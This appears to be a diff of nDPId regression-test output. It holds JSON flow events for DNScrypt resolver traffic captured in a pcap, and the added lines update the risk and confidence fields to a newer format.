-00722{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312402,"flow_last_seen":946739312466,"flow_idle_time":180000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":695,"flow_avg_l4_payload_len":347,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"93.95.226.165","src_port":58936,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00725{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739380805,"flow_last_seen":946739380838,"flow_idle_time":180000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"212.47.228.136","src_port":60885,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00721{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":135,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739317496,"flow_last_seen":946739317819,"flow_idle_time":180000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":694,"flow_avg_l4_payload_len":347,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.76.113.31","src_port":51589,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00724{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304599,"flow_last_seen":946739304626,"flow_idle_time":180000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1651,"flow_avg_l4_payload_len":825,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":56035,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00723{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739380804,"flow_last_seen":946739380832,"flow_idle_time":180000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"212.47.228.136","src_port":38371,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00723{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305219,"flow_last_seen":946739305326,"flow_idle_time":180000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":33071,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00670{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":131,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739317462,"flow_last_seen":946739317496,"flow_idle_time":180000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":828,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"178.216.201.222","src_port":38594,"dst_port":2053,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00723{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304363,"flow_last_seen":946739304396,"flow_idle_time":180000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":348,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.238.186.192","src_port":59261,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00666{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":198,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739380984,"flow_last_seen":946739381017,"flow_idle_time":180000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1651,"flow_avg_l4_payload_len":825,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"85.5.93.230","src_port":39259,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00726{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":946739312402,"flow_last_seen":946739312402,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"93.95.226.165","src_port":40595,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00665{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739306241,"flow_last_seen":946739306433,"flow_idle_time":180000,"flow_min_l4_payload_len":319,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":831,"flow_avg_l4_payload_len":415,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":49512,"dst_port":1443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00724{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305155,"flow_last_seen":946739305191,"flow_idle_time":180000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1654,"flow_avg_l4_payload_len":827,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.59.200.116","src_port":43633,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00666{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304328,"flow_last_seen":946739304367,"flow_idle_time":180000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":59405,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00664{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":946739299327,"flow_last_seen":946739299327,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"62.210.180.71","src_port":49518,"dst_port":1053,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00722{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":237,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739402188,"flow_last_seen":946739402354,"flow_idle_time":180000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":348,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"23.111.74.205","src_port":44793,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00739{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739311802,"flow_last_seen":946739312103,"flow_idle_time":180000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":828,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"52.65.235.129","src_port":46313,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt.AmazonAWS","breed":"Acceptable","category":"Network"}}
-00667{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305327,"flow_last_seen":946739305350,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1515,"flow_avg_l4_payload_len":757,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.112.112.10","src_port":42570,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00833{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":165,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739337078,"flow_last_seen":946739337184,"flow_idle_time":180000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":348,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"167.114.220.125","src_port":39816,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305192,"flow_last_seen":946739305214,"flow_idle_time":180000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":692,"flow_avg_l4_payload_len":346,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":34885,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00833{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":238,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739402188,"flow_last_seen":946739402354,"flow_idle_time":180000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":828,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"23.111.74.205","src_port":53045,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00831{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":181,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739348805,"flow_last_seen":946739348917,"flow_idle_time":180000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":51647,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00833{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305155,"flow_last_seen":946739305192,"flow_idle_time":180000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1654,"flow_avg_l4_payload_len":827,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.59.200.116","src_port":37595,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312132,"flow_last_seen":946739312183,"flow_idle_time":180000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":40451,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00830{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304789,"flow_last_seen":946739304821,"flow_idle_time":180000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":695,"flow_avg_l4_payload_len":347,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.122.250","src_port":36668,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":129,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739317462,"flow_last_seen":946739317493,"flow_idle_time":180000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":348,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"178.216.201.222","src_port":53117,"dst_port":2053,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00830{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305219,"flow_last_seen":946739305329,"flow_idle_time":180000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":43505,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":174,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":946739337184,"flow_last_seen":946739337184,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"5.189.170.196","src_port":59749,"dst_port":465,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00830{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":230,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739400522,"flow_last_seen":946739400550,"flow_idle_time":180000,"flow_min_l4_payload_len":192,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":704,"flow_avg_l4_payload_len":352,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"77.66.84.233","src_port":46140,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00830{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305348,"flow_last_seen":946739305453,"flow_idle_time":180000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":348,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":38388,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00832{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312286,"flow_last_seen":946739312406,"flow_idle_time":180000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":828,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"66.85.30.115","src_port":47432,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00833{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":186,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739348805,"flow_last_seen":946739348917,"flow_idle_time":180000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":47621,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00835{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739400460,"flow_last_seen":946739400522,"flow_idle_time":180000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1652,"flow_avg_l4_payload_len":826,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.193.127.244","src_port":46314,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304328,"flow_last_seen":946739304362,"flow_idle_time":180000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":35005,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00833{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739317403,"flow_last_seen":946739317431,"flow_idle_time":180000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1659,"flow_avg_l4_payload_len":829,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.158.166.97","src_port":47257,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00830{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312105,"flow_last_seen":946739312130,"flow_idle_time":180000,"flow_min_l4_payload_len":189,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1661,"flow_avg_l4_payload_len":830,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":38812,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00831{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":217,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739396111,"flow_last_seen":946739396210,"flow_idle_time":180000,"flow_min_l4_payload_len":192,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":704,"flow_avg_l4_payload_len":352,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"107.170.57.34","src_port":54375,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":214,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739396070,"flow_last_seen":946739396108,"flow_idle_time":180000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"46.227.200.55","src_port":50277,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
